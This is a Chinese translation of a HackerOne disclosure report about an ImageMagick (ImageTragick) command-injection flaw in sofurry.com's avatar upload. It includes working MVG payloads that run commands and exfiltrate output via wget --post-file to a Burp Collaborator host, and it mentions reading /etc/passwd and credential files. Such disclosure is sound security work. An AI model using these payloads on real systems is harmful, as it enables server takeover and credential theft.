HackerOne | 头像上传imagetragick命令执行

漏洞信息

发现者：alyssa_herrera

漏洞种类：命令执行

危害等级：高危

漏洞状态：已修复

前言

alyssa_herrera在sofurry.com头像上传处存在imagetragick命令执行，能够发现一个配置文件包含数据库凭证、其他密钥，影响网站。

漏洞再现

在审核配置文件头像功能的过程中，我发现通过使用curl请求（如下所示） 使网站受到image tragick影响。

然后我去请求 /etc/passwd。

然后我想进一步扩大rce的影响。由于不想反弹shell到服务器上，我选择简单的在tmp文件夹中创建一个文件，然后将命令输出保存到该文件中，然后对其进行提取。payload如下：

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg "|whoami>>/tmp/alyssa.txt")'
pop graphic-context

然后我们使用wget去读取它。

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg "|wget --post-file /tmp/alyssa.txt XXX.burpcollaborator.net")'
pop graphic-context

接着一个简单的命令ls -la。

然后我又读取了位于受保护目录中的index-test.php文件的内容。

当我读取到这配置文件，记录下来后立即报告了它。

漏洞影响

该漏洞可以让攻击者执行任意命令，读取服务器上的文件，甚至控制服务器。

乌云相关文章

有缘网主站命令执行 (ImageMagick 补丁绕过)：

https://wooyun.x10sec.org/static/bugs/wooyun-2016- 0214787.html

开心网主站 ImageMagick 命令执行三处 ：

https://wooyun.x10sec.org/static/bugs/wooyun-2016- 0205530.html

SAE 沙盒绕过（ImageMagick CVE20163714 应用实例）：

 https://wooyun.x10sec.org/static/bugs/wooyun-2016- 0205051.html

翻译自hackerone